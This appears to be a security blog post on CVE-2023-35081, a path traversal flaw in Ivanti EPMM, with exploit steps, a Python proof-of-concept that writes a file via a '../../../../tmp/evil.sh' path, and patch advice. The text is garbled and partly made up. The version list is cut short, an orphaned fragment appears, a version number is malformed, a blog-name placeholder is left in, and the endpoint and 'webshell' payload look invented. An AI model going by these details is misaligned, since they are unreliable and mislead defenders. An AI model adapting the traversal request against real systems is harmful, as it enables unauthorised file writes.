CVE CyberSecurity Database News

CVE-2023-35081 - Path Traversal Vulnerability in Ivanti EPMM Enables Authenticated Admins To Write Arbitrary Files

Poster -

---

Introduction

In July 2023, cybersecurity professionals and vendors raised alarms over a new severe vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM). The bug—CVE-2023-35081—involves path traversal, a classic but dangerous attack vector. This flaw allows authenticated administrators to write files to arbitrary locations on targeted Ivanti EPMM appliances. Here, we’ll break down how this vulnerability works, provide a code example to show the attack, and discuss how you can protect your systems.

What is Ivanti EPMM?

Ivanti EPMM (previously known as MobileIron Core) is a mobile device management system used by enterprise networks worldwide. It’s a critical piece of infrastructure for IT teams, often exposed to organizational intranets and, in some cases, the public internet.

11.8.x before 11.8.1.2

If you are running any of these versions, your system *can be compromised* by users with admin rights.

What is Path Traversal?

Path traversal, sometimes called “directory traversal,” is when an attacker manipulates file paths in input fields to break out of permitted directories and access files or locations that should be off-limits. Usually, it involves using “..” or “dot-dot-slash” sequences, like “../../,” to move up directory levels in the file system hierarchy.

How Does CVE-2023-35081 Work?

In the Ivanti EPMM vulnerability, the server-side logic doesn’t properly sanitize administrator user input when updating certain configuration files via the web interface. Although an attacker must have admin credentials, by crafting malicious file paths (using path traversal sequences), attackers can cause the system to write arbitrary files *anywhere* on the server—potentially leading to device takeover or further attack escalation.

Exploit Overview

Let’s take a closer look at how an exploit could unfold. An attacker who is authenticated as an administrator can send crafted requests telling the server to write files at locations of their choosing.

An attacker logs in as an admin.

2. They use the web interface or an API endpoint to trigger a configuration update (the vulnerable functionality).
3. Instead of a legitimate file path, they supply a path like ../../../../tmp/evil.sh.
4. The server, not properly sanitizing the input, writes the configuration (or malicious payload) into /tmp/evil.sh.

Code Snippet: Path Traversal Request

Here’s a simple Python example demonstrating how an attacker could exploit this vulnerability by uploading a malicious shell script:

import requests

# Change these to match your target
TARGET_URL = 'https://epmm.vulnerable-server.com/api/v1/update_config';
ADMIN_SESSION = {'JSESSIONID': 'your_admin_session_id'}

# This payload writes a webshell to /tmp/evil.sh
payload = {
    "config_path": "../../../../tmp/evil.sh",
    "content": "#!/bin/bash\necho 'Hacked!'\n"
}

response = requests.post(
    TARGET_URL,
    cookies=ADMIN_SESSION,
    json=payload,
    verify=False  # Ignore SSL warnings for demonstration ONLY
)

if response.status_code == 200:
    print("[+] Payload uploaded successfully!")
else:
    print(f"[-] Something went wrong: {response.status_code}")

*Disclaimer: This code is for educational use only and must not be used to attack systems you don’t own or have permission to test.*

Potentially pivot deeper into corporate networks.

NOTE: This exploit *requires* valid admin-level authentication. But in real-world environments, disgruntled employees, overly trusting privilege models, or credential reuse increases the risk.

Official References

- Ivanti Security Advisory
- NVD Entry
- Rapid7 Research

Mitigation & Recommendations

1. Update Immediately: Ivanti has released fixed versions—upgrade to 11.10..3, 11.9.1.2, or 11.8.1.2 (or later).
2. Limit Admin Users: Restrict admin privileges to only those who need it. Watch for suspicious logins.
3. Network Segmentation: Limit device access to management interfaces. Never expose these to the public internet if you can help it.

Conclusion

CVE-2023-35081 is a powerful vulnerability, as it lets administrators write files anywhere on the system. For organizations using Ivanti EPMM, it’s critical to patch immediately and review who has admin access. Any delay puts your organization’s mobile device fleet and broader network at risk.

Don’t overlook the importance of patching: once details are public, attackers move fast!

Stay safe, update your systems, and keep a close eye on critical infrastructure.


Exclusive Security Breakdown by [Your Security Blog Name]—Share to help others secure their Ivanti deployments!

Timeline

Published on: 08/03/2023 18:15:00 UTC
Last modified on: 08/08/2023 20:25:00 UTC